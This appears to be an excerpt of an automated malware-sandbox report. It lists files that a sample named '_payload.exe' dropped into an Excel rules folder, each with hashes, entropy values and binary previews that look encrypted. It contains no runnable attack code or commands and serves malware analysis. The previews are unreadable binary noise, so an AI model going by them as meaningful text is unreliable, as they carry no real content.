                                                                                                                                                                      SHA-512:23B90DB47D7BBAB2F6C5B7E2765BD3061F7964CF028496532CF64BF9BBAD88224A1C2FEAFD8815F6906C49798D245BDD18934BF694E0B2055E0A6A2DCA818373
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlBZn....IQ}v.3{.e^.G.G.D|'...v....`^.U..[..._..K....6..RrP.V.MKJ..z{.P....u.6..?#..*h..z?.......m..1G.....;...P...%A......'.])X+.l..x+^2.A....*....{,.g..L...N'd.....T....5!...]...o..?..r3.......g8.Uf..y.n..^...5..............'.....7 2.FE.... ...........i}..&.m@Cp....n..7..|.a...3..l(H5..I..'.G. ..v....o....._.t.....w.*a...........J <...@.-y..*.1..M....+..#B.....~u..].y.....r.k.A.f-.~......#...h..C.|..El`..(.1..%#...(..=..?...P...+....d.6G'./.{&*....=e...Z..`.^....e.j7..6.w......}.(...O.F..r.ZV..Bh.w.. .m..l...PPu...Q.#.tX9...BJ..'\.|....c../........R...L.._r....h%..P?f.9..+..{%%.....i......!:.Y?i.l......I..K.._......,%./,.......c....x.._....F.26..v`...wC.y#....#.7.0...=.2..y..!u.8.)..es....&-..=..<......Y%^m...i`.?....Y.La.gTJ.l.t..Bm.v.lx#....'.S..n....@XQ.|.b.....ya..B.u.U.....4M(.?,u.lxy....:.o...K..OAcW...E.i.*..$n........4...q....;....m.d)@q..4.A.Z.?.....):p/.A.X...i..)...D@Z ....G..n.....`!.Td..R.<@a.....lQ;.C.....IX.[.T.N@.....a.OW@

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12035v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2801
                                                                                                                                                                      Entropy (8bit):7.92052339151524
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:P3axir8VFXzg2lVF54p2rVfRnbjXGLgHCg5GCACdb22dvIxsdonWD:PaiKjLF+6bhigCAy2hIyqO
                                                                                                                                                                      MD5:F570BB04E03DC4C09C3C2FB343866EB6
                                                                                                                                                                      SHA1:C4BCD14680AF62D6F6831A262D7621A91909B557
                                                                                                                                                                      SHA-256:45A012C3FD6389F94CE8C4FE2A50E6A79B1A6699FA3590746CBCDD92688D9F14
                                                                                                                                                                      SHA-512:49D23B4DD4F7D1FD2912D7E056F0BD2C071CC1AD78A439C32355A3203F8FD39704D38A5C8CE17901ADB0ABED4CB7836C156B87552A5D8525AAA0B79012836457
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlWi...[...B.4.'..........H.3.......9.. 1.......9\jE.O]m...d.9).......W.T@O.Q..45o.A..us.\.H......_!5 ".......\..1../]P...vk.1..HfbCJij..*.......+...tZ.".^...q....B.@..zY.V.fD...o..W.:.O`P.n...V.H..("..2p.S...0n.jK.|....b80.w..).^.)y4...$~.5...".L.FR.|DNW....l..{...s..w...8...V......\......\..t...R.......T....i..L>.D(k.$.*.!....qF/.#W...:l...9L...]x].R...M..q.s.2z.>..d.Y.E........b;...P.4t..*.....X."....z-Z...n.....j37~!x.........."...Y(..8..Q.U{..M......} ..Am.....&.k*..<R{0c..h..y.......V.W.H....c..q.gXCiU....Hm.......K.c..: '....M........\].Y...K.g...W.uS....._%.T.._T.J."q..3.P6p.f0..Mf..<%. .........?_.....A.<........2.@M."..S.`...(.BZ...6..|J......Wt...Ig.p^.,.y..h.I(`"...d..@..O.3@...H7o.-.@...Q..=_'e...+.......'.......K.i.Z4i'y@$..c.6.fg<d.d'V....w...rey...j.*..g..L-....5u1v.#..WA.......~@....19..d9w.^&....8Y>%.W.{...ut(..a.>.)JnKP...)...,2.k!.9...f........8........P.U..`..#!-.<"I........:.........~....^......k.5.J...]....5y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120402v21.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4121
                                                                                                                                                                      Entropy (8bit):7.959450712676463
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:eBE53Z3+oVxWxNT2IfquIvxXsovLZL7j6mpxbid:YQgoV2NClxxvF7Xq
                                                                                                                                                                      MD5:11D7B3DE282DD23C69B38D666127BF19
                                                                                                                                                                      SHA1:F91B05D61ADD35C5E71E9BBBB0FC911B7B10A18E
                                                                                                                                                                      SHA-256:3F152D673BEADB41B37D166E2CB1D125FB8665233333CFDEE231BB1FC7B0C19F
                                                                                                                                                                      SHA-512:7925D0D39FC3165D2B1C635D8CAFFD59349C2CA5A58CB901200ACAE9BB165D2EADA10A56E387298B37293D78497C5E324DB3F94F404A8ADF64B10B44FBFC8D8A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmli..'..HPN({..oJ]pm...Yh.N..{.....ql.........^u..@"}.X#.........s.....j...)n)...&...TT.W.f.YM...:.R.....iB......2P.!.6..y....<..A).Z.Hf..#f.D0`.....@1.G.&..I.y>w@..}... .H&.~..7l.........U.Ga..=bE...>.P.)..wy.......:......`..1..,....(.u.5#.k....R.u]...v..Y%W..%J?B..nR.a.[.....y....I.[....jdu.~[..b.c....r.h.D....K...... .....^V...s5;~.....d.....dBP6(...c...%(\..l.<KE.<.]&.S&.......v9.'.......=..T7..?(..A.....=..........i..Xf.._.t.3.*.P..br.G&E.>K......?..6..Mc.m.......@.~9...E|.3........sy...0b.....f..\_}.!....";W...|6..|..3..%.....Am..i...g.~....y.;..fBW...[..K;C2...1..h...w..Fk*Y.......Bk..p.a...J....nJ...Jy(..&..[....=...g...(.YtK.Y..S...F.k....4L.....V.%.yV.g.z..nn~*/A...~..S^.......{..5.y...]..G..l.moP.K...M .!....<....l.._4.~=9..0.N..TI...VKQ..6dH.g..a.a.......|o..Y.....0.FY}F..:'.o.<.Z..h'.....7...J.{..N/..$s..OI.=^. .q.\...M....Q.c)MW..>.w"'....$....c..D..&.u.'.8.).....F..ISn.....0....`...Y.K...^...<p..`..e.A....`I').o.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120501v17.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8140
                                                                                                                                                                      Entropy (8bit):7.975255572472517
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tcJuS/xYNic6SjV0j6foqJoEhFBxHq1h9qsL5z:WJrYNicT4w1JouS13
                                                                                                                                                                      MD5:7321E1955592305A63F6C945D95A45CF
                                                                                                                                                                      SHA1:B9F6D821754E4BD3D0D2995F517AFEDD87C08AA9
                                                                                                                                                                      SHA-256:891A4A99FA7ECCA49DB01C3D3A7C015C782C14E8AA6AD72DBF967090663B40F2
                                                                                                                                                                      SHA-512:877694FCA99BFA5CDF7AC01982A742B66CB0D459062213FB761A729BB8F5B8DF711D2FB82D8CCDA2AF8503D19CFF421CAFE4C7823F67DA31501833CBAA0D624C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.i.....X9.;O..".9.o....r...4$.&j:=.M..e..|}..e.'4....r..f. ...9!U.Z./K.|..C.pI......".Z...0,.-.!.]~Z..'x...7.~.....7.x.D.}./.]...4.`B.|B.S...`...$"..O.@z....gq..n..u[t..ES6.$...oa`.T............L.dH...p.S.R...3e.R..5.5..........-"G->e].5.....v.b........x........$.Y.{.Q.J.8.......L.;..e/}H...O*. .Rw..u.08...+q.`.-B./.R.#6....<....QT.7."...;.~...D.3._..:.1^*P`M.S..R=.......E..a...PC?.8..ULC.L.......eq.%%.z6....q~.1._...|.....z..j..n.M3xa./C67..lnWm..<....g....0.$*............>...o.|.C(..(...........R.....Iaz.g..._.R.{.....3.....7.\..Y.8....&59.....X...1"H......[U.Q.t..28p.R...A=...v....n.H.\.:S...-.I....d.].;.*..r..m.u.c.Ny..p....Y....0.H...r.r....DM\,....K...@L..l|.P;...m...Wp ..IL.. w.\...(.f.....`.-[....q...~3.A....@.Pl..6/.@H...J"e.q1..D..............V3..X.@.;....].....f...#...l.sbsx.t.`..z.)._}Q<B.7....&./..I..@c.&......N...x.....v.b....G.I..........v.aS..#...;..r.&.t.T...D....|..%..2.)...D.!.H...HK.....[3Od......Y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120600v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3313
                                                                                                                                                                      Entropy (8bit):7.950049513345948
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:ijyVU4mylOmZ4p0pCJIEzQNdFQEVzAHE8R:i5sOD0pCJIaQN4TR
                                                                                                                                                                      MD5:30D2DDBE1096604A466FDEC6D3529C00
                                                                                                                                                                      SHA1:53EACAF78D9250A7895FDC9DE2AC44758D0B90B9
                                                                                                                                                                      SHA-256:A0D730434F58BF4CB20A0F525768132A07FCB5FA496F61D9E5CB16B429F28A52
                                                                                                                                                                      SHA-512:737093BD03D9FD4D996E63456CA80B4F89AACEE644B0013615D9DDC78A52CB9607A77D2447714CACFF57E70D3530D9C3B1DBDD5F60B26EB80BE917A0A24064ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.zI%....r.U.Aq.;].$.._../....O.3..Lu{..?dg./....s...X..b............K..RV*<.p...'q...A......#J.tV..W.......b..&...8l...\5n..).M...E...0....X..*j ..w?.@....O...h.........../9$........\+.5*q...i...2..:....3..g.N..z.A.......w|..z8....s.x....1....Z.......r...".d.^?V....2....m..%...m...O}......d.A...k.5wD.t.1V.w........8.8.5G...vd.`.r7....NF...._..q.E..=M..\]...C|[..........Q..rY...~.r...\/.&aS....i..}b..t..CW.....Y..4.dH..G..0:...$.@U!.I.....Bw+.P?...,....}{..s.m.....@.eX....x..Q..;..9...."......]+.......G.;.x.....B.v..Z\yt.4.w.......-..(.....+.%N8_....m..y.....J..+Ej.}....bE6.N.........)p..G.f.).f&.Q..C.;+j..6.U...$L..J..hKG.'.Eq0..k...g.MF....^..K,......pZ5.f.Z#.w.5..!..S.R.+...o...........`.O.5..B..hH....y.w.g.2....1L.Nv..).y..Z..g..=.N.?..}H..YS..j....6...\.#...&._.......OO..{p....3_.R.{.$=^SQ...E...^J(}.K.? ..+[3R.y.v.v..g.!...&.z.....hy...a..`p....0-R..x...x.........t.9.Z......,a.L..o.l%T.K.X...P.9....L..U./....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120601v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3675
                                                                                                                                                                      Entropy (8bit):7.9498811840153305
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:tMmnu2JxMW0RtGXeJH12abumdpJs1w0qRZGmjCwLd:6+CIeH2Y3B0+GmjJ
                                                                                                                                                                      MD5:44C0B72D4D4D31966BB3EE2CB3371A75
                                                                                                                                                                      SHA1:C7FE77C6A69724F7815530EB5485D0C2FA8BDDCC
                                                                                                                                                                      SHA-256:D7BDA112E062E324D40BD25A95175208CC2E2E6DF2A5057386D54505BA255D89
                                                                                                                                                                      SHA-512:E2A4E5437E0714737ED89EBC338DA6E830A9314B620ECF24245C2B6F2B80FDB501F1330CDC638D2CFF76DFCB0804C43D3BF2C499EC19241D39C1D13F95079924
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.k.Ch.'...H4.*..x47.C..........17D.Z..U....P.~...0.-....W.8. ..6n.H..&>..T...!o?...N&.P^..U.x&.A.4?...>....!".ok.k..`.wI.=.2.N ..3aC..(....g.p............Hd.rEg^.R.......0.q.g...o:X.i.,th.y......z...|....v. .zU..P...V}f...X.fS.....f..a.K."j.....\.l...].g7.&<Qa.)...&.Z.`.M.."v$vu..^.)..v..+...!.....-..>h:8J5(..yORr~Y..q..N0*rv...t..r.v.q4z......7].C.~.l..8ZR...Q`./....-\~.s^.~c.W>....B&w..O"z.......:I..T....'f.....g...m..N.......6.f.ub'.....D.@#..@Q...+.0.'...i.z...@..zy%..\.s..l..ig......S>.l...........f.FS..+._.X..*%.L(A%.q..+x,.VE...F.`...}M5....f.r.u._&eY.%......}....Si.?.d..p]X....2i....'........0.}..S>(......<..@....K.X.,*.#........u.....X3.$....C....,....6..m.Q..1.V..Te...7......$.4zM.\..k.{*=....T..V.f,M..).=..;.\R...........HH.D...._.$Z.]a..d.$..1.x....D........O....4.c..U.c...[....f.W.{.~2./,....Xe...Z..,M. .E...Ch...B....._.s^..D.6h.|.M..Sx.m.I}.g..)<...e..|.a+...+/.&}I.,........|.....U.x.%.."I...&..m.[.K....5r-q..X....Dyy..m>.F.;$.._..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120602v8.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2924
                                                                                                                                                                      Entropy (8bit):7.938181295389493
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:033AmFHAJ7RQ50pzDB751B3VTHWf3+lygBhxqY1o79T4QnNSzPZ1oiPOjJD:OAmF07RPpzDJbbW2ygBhkY1qszB1n2h
                                                                                                                                                                      MD5:F052FA7AF3178340B6801DB7BED27FB9
                                                                                                                                                                      SHA1:A206C3187DEB5C38795242863454C25F0D7E9047
                                                                                                                                                                      SHA-256:91BD0E0F688C923F4C5A2E7FCAE5196FD0F42C1407B6788DCBC1AC6227A61331
                                                                                                                                                                      SHA-512:BF858C70EB18F5A00EEEEEF34153DF52A3139A078D3C3F69FA73EAC982326F77ED69B96D1E43FD2765BEFDC70BFF9DFABD7F274452A189CEC8AC3C033680E57B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlb.P+.i.....Q4....'...#..(..E.?y......U. ...{=o............~2.....Q.<J.<.X...9.0hPR.L`..!.L.... .|....#.h...F..gW..,| .wP.D....@w........A..(.wZz...a........R\..!vCo.)#..(..~.[gb...~>......H..r{.s..X..?.....6.,.L:..b..-.)ds[..E.x....}.].{.jx5\.$.x...;...p...?..%l..jzC.!.....f...>.._$..A\..`....s....1:..Pq....X.:....':.+..{..J8.e.]...R..?..9....cy..N..X..s.D.L.8.Rb..v..GR6........T:..I..rO....<(...`..f..\..M...t.3.:c..0.{tA..O.6"..d.0.P..zSgj.j....Aw.e8.._...E..k......(O.X.. ....=.W...."..4r.]GE...p.U...R.r,3#B... ..J.*..0.D.9......s...j...Hll{.R...%^j....`....M.....B.a..m..t.$..=-.+j..v.Z+.u..qL..u.....\$L;.(.../0...".....k<,x...O.L.rh.....2.......#..I_...."...+.%t...dS..R.......;!+d,/.3k..v.......E.....M$.v..w.rZ..........P[..Z.....p.:....r.. ...........Z....\..m..9.J'...?...]*cU.....N'.z4.V..S.6....va.C7...b.G. ......w...73y...6..........b....91......D.z].(.R...s.p&...;..[.}....`K.2...4-.!4....:....<...l..u..P.Lbt-..ro...tF.!NU..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120603v8.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2461
                                                                                                                                                                      Entropy (8bit):7.926714760073056
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:GUSTLVGRkfrlfh8YHwIoSbEGIVd/EbvRri5YB7nj5BZZZD:GFGG8+w+32+bvRri5CjXZZR
                                                                                                                                                                      MD5:2A70BA971B097E59892065966269E43E
                                                                                                                                                                      SHA1:97942E168B6BFE2F073B19979D84A1CEB9876381
                                                                                                                                                                      SHA-256:E02CC45A9803BB369E145423A17A98481DB6E5783F9608D9EDDF8CA15D6E54D6
                                                                                                                                                                      SHA-512:AF0856764A139CC3C2C7AB4468BF874C5C880ED7DD53B4842F1C58009347CCFDD8ED2C3E16BCA947097A13A99C6D426EC1BC9540B7688D748C82E00906790B73
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..w..,.W...%.:..._......R.].9:.'R.VNYal@.qD.....l.^Sw_.......x8.F[#/....=.....+/.P?.....rm....J_.....|`.J.3.X.a...&#ls.U#..YbT.M..y.,.T..9....O..W..%.X..3..>o9.op.+....8.(eA..&.w....q.zR.H1..|h.8oI\.....Wf.B......m-..q.-...Wi`R9..i.e.FxX........@Mt.D..`...&..$Ue......R._.(.+'.!..KxR..3Il\..o...K..%.c....E...tA....yO..s.:/.........5.l\.g.'...r.I.H..hT...'...*.e.d..6..!,...ES....F.,..@x....C.<...,v'....|#K."D...x.*...!.z0.c..n....6...S..T=D0....`..|.uH.m..\cM.8..@.....=x.O....U.^.y...R.VkEF.oh.vY...<+.Q...........7O.."......eF5....h..(..XN^.g.u...{.MR7..zVG.:\.S...h......Q.F....*..K:.uD]...\..P .._<....U......2a.9.:.p....[...`.'$..T.Oh.y.....^...........~.$./o..~l......y...b;..d{D.~..`...-].....M.,f.........z..7..(.K.....]....R.........Tg.......X.. .gx.Z.ca.e .'......9/.p^8..J.v...}..3X....z}.L!........R..r......q. ....k.oo..yX.N..>,..D..a.|.Q..R...f..y.I..w.*..Y.M..a.....d.!i.......P.:.....G...~ul....3Qu..]......df.......2.}iV.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120604v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):758
                                                                                                                                                                      Entropy (8bit):7.6811666361461075
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Sb5Kf3wmGthUNNlD+cxfLUvGbzsVn+tcVCd2lUSUdNcii9a:Sb5e3PGwnxzIkwWZ2x2bD
                                                                                                                                                                      MD5:C3C0ECB4EE7FFC75D48F7E38B812A98A
                                                                                                                                                                      SHA1:3A8291CE31B3ED0DFEE3C230E31977A431B42AD9
                                                                                                                                                                      SHA-256:FD6EBFBF257511F103194381D2D7154F1DB377E55ADBC6B1B8E52F81B0D06644
                                                                                                                                                                      SHA-512:BC5C3D4E5608EBE5B6FCE88944F1E99F777C19CB4CE7F5A00EC5E84B297ED0B2DEBAC7D9F45BE541F922A8882FED35A202D6399ABDF4C0688950B80451AA8296
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....I.]$..O....;...:x.s.Pj.W.!9.....^.t. O..*.=..P.Nw..:.....y...c.D........9...*Y.%S3m..^..^..a.......#S...#.R..n...p.0....^JI..D.(..<A...$.. ......[. .'.....Ae.uU.`C....=.[%.../.d.3O<..5'.....i.\......2L0....D1b./.d........?e.qzZ.oY..U.<........j.w._ni ...z.W..t....Ya..$n'0 ......I.T.'.sXw..q.u:......}_.v1..Y.8....c.......A.f....G.....E..55|..U......<a.~J.dc.U..z!..^...-.O...m....B,B..f=.,5..Wr.......?^.Ul.?.%o.N.h.9...,z,.1.Z.....o.K5.hw.j.{.......8.H"......g._Jb....{...m....?M......S.m......g..`.Ex.F.<2...L......np..@3k......p..WL.{.W.~*.l....)c.ez.TP....I..o.._...,..,-f.)kN...TG.|k..c.p=...Xw...#...j:.<.P$..T..D....4..].q.u.\j\.H.=......GmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120605v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1210
                                                                                                                                                                      Entropy (8bit):7.849137613506355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:X0VtTHMsK9j3uhClOXAfrzviE4PF0J0xNgSfgx9ehLLyq2bD:MtTssK9j3uhCvrzviEOKClgxwhLLwD
                                                                                                                                                                      MD5:29789D4EA67D9178B210502B1C85E3DB
                                                                                                                                                                      SHA1:3827CA5541E86AC3F397982F243A83DCC3B801B4
                                                                                                                                                                      SHA-256:F6EC48C9FC1DDDCD22AC0907A0CC0995F0BC66DD2EE48EEAD4372493F0C019BA
                                                                                                                                                                      SHA-512:87081DE7BAB087423647A9C693EE3AA507127C99D579FEEF90941CC8278AD3F02A3C8A8B69531C0B814EDA5B9C953DE979DF792A29040DB68DC572B468AAF4DD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..../a..R............j.n..M..%...9.~wo.;2a..`.......!.u..Y.D.8.+$...R.gH.z.......t8..Z.m.p...K<.v.....F.Lz..*@.....b..4..@..g..s8B..g..j....a' ......,...$.@....&.^w\..gD.....2...............>..DoO...GU.['......q.gy...i+...MB..4}..1>zV.h..M.I.(.q.v....1.."....L.......l....".Oa<....t...O;.}q......(..,....h.._.Y.}V..V..%.Sp.D;....f.W+.S.Mo.G....U..N....fq..a..R..q.@....,..........@.{U.ni..2c...[U...g5.+.l.e.OXY~...>.e9....y.Bl$.....y?.....I....VA.i..O./.....#..@.,T..;...O....Ru....M...q.T.).u..R.%....#..5..... .[Ud.N..V.....%.{.F.AU..B..y.u...C.........#."\.....).......C.F...^A#L:,...'.5Q....3D0..7....r.8..+..2g..+.'.+4...t....9.....yD.#.yu...:... v.'..-2$..0....Q.~.9K.o.=...L.......%...l..^.q78........{..P{.........O...Q?Up..F...d..|6.G.M_....?..B.,c.A.....F,...xI.j5....7.:.v.J..yq...].qd..}...e.`\...m..^.H..D..=..K.....'Ddo.j...^e..q...3..../zN_....B...lGc.......Z..7~5u.A.....@..0.q.s..AsA..5n.u.....c...P.O.......\..J....6..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120607v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):537
                                                                                                                                                                      Entropy (8bit):7.550897943344439
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:tt9Cmry7gqL9phQv2natO9HRtnSUdNcii9a:tt9CmfqbW2aEO2bD
                                                                                                                                                                      MD5:AC007DE614E88800EB70CCB4F6EF4185
                                                                                                                                                                      SHA1:41DD65FD5AFDC65AD3A05D41CA278EF509230FA0
                                                                                                                                                                      SHA-256:66DEF68678C3849A00E6E396C7E74FAD63A7F34BF28AD498D7B46AE86DAEEC72
                                                                                                                                                                      SHA-512:F6DEEF3F0DA9C167FD5483DEDA97C15B683CDC314EDAD2A3A0FAA07D6B9DF9051460AAE288393E6C64789A7601AFE17908A1512522DC871959EDFF1E25902E63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlohT..... SQ._na..]9.}.!C.V.(...y4.......U..L....[.4..o2<#.eGY..u@....L..e...Vr.zk,.>.W..DV7b..}....Y...n..x...h.,|....y.Y..@B..=`.6..Xh.7......e..U....$Q...3.8......l.Z.Adx.......zhOVB.j.y.r..^..S.A.e./..j..nIc/4g..m.>,3H..}..f.W........$.h..c..f.x..X.`..vuL.. .q..Y3.1r9...9Q..D.[a.+....}.2..f."q....rT..P...+...,.../X.bj...=.N....o&GN*&j1NDk...T....[.T.%..sq....S.D.B.."..........a.~-.+.q0..s{....w...5d@w..}_..Z..0_..}..E.....emMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120608v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2493
                                                                                                                                                                      Entropy (8bit):7.926249525272419
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:IE27EraXf8bpk6f51bjApGN8vcSrFDjOkMTtYhySx6HtvFFbRtD:Jrwi/bMGQckD8tsyPNvF9
                                                                                                                                                                      MD5:A980ABA9D7834A28FAF4E17A4C6F7DEC
                                                                                                                                                                      SHA1:E82C1B124AAEBE791351A12245650AF13DDD6F38
                                                                                                                                                                      SHA-256:6D621BC87EF0E826F110AFA1141C56AB0A9303052F008CB629DD57870EEACE3E
                                                                                                                                                                      SHA-512:B91B640320C7D76884E89D257DC542062092178C1D6A3E62C8F0CFB3A7F0CD0E29520A16F73684D71F49114613B21BA3366CA473FC48D1E2981194731258DF68
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.[.k...p.L.....d....F.m.+`........,(C..............I.O..h]]g:HT....[....H.T...`...5...e*..D....o...Z|.q.......Tq.eNR8....o..P.HZ..ds.[.m....W......W.\..d...3X....M..H~.V?X>7.6%./..\].h.`..r.t.S..Y....~kJJ.{..~..1.>...GAY./.T.z......Lu..h.....v1.,^E.^....*...x[6c-.#tD".....f.E..I :]...u9.H.Y..1.Q:..3a.Ul.Ea...s..i...u0.xT.3B.../..g......l%..Y.Em..!(..Q\.....Y..$en...D...6f#".. ..`vM.8.2..8b..z..X)...6.....),..n..5........y.Y.J>_...!M9.:^........}.5.?..].W.......?....,...>[.......}. .o.o.o....|A.T 7sa`.s.h.k_.^Y...C...E..n..3..u..-Z*..z .i.Z........z2....R:.b..)..l....J. ..L/.t;Xi.....L1h.y........y......f...C...yk.K*{.._.go.$..p;.g.y..c.b....k..N....................D.]{(..c.A.,ZpH(3.'..9..K..[..h'...@..)~.K2...4.&Z.om.>V...Pi...c.[O...1.........a.p...W..6.......U...V......5..'.<t..E....pw..R....X.../..-..a.\ ....z.:_..V.A...]..WAz..N$......v..hw$.dsQ4...>..o.....V....l+l^.`.lo.@A.S&.}{|m.@.!.!e....[tA74...@3J.q.... ...o.......)..8.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120609v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):741
                                                                                                                                                                      Entropy (8bit):7.701389545458007
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:mOmkLwnYAv6BpEoMeWZY65icIYVRrRU6YAYYMobyZMebsXLjr5YQMhguIkZt8980:9LzoSapeWZd5iajrR3nlMoOybjrSfKwq
                                                                                                                                                                      MD5:15FD516910EBB737470ED8CDCF805604
                                                                                                                                                                      SHA1:AE9BC19C8C5C2EA187DB1FD21B165F783123683F
                                                                                                                                                                      SHA-256:C7147636A80593F693705DD37AF754C09B8A8E3A84454CEBA614BD0598807DDC
                                                                                                                                                                      SHA-512:113131789051C508F63362211E22CED41834E2A55CD1B664F96F336E8E2EBEB18005B693FA2F41E25DBFD57AEBEDC0019574050357EFE2FF847CA61B36D3E810
                                                                                                                                                                      Malicious:false
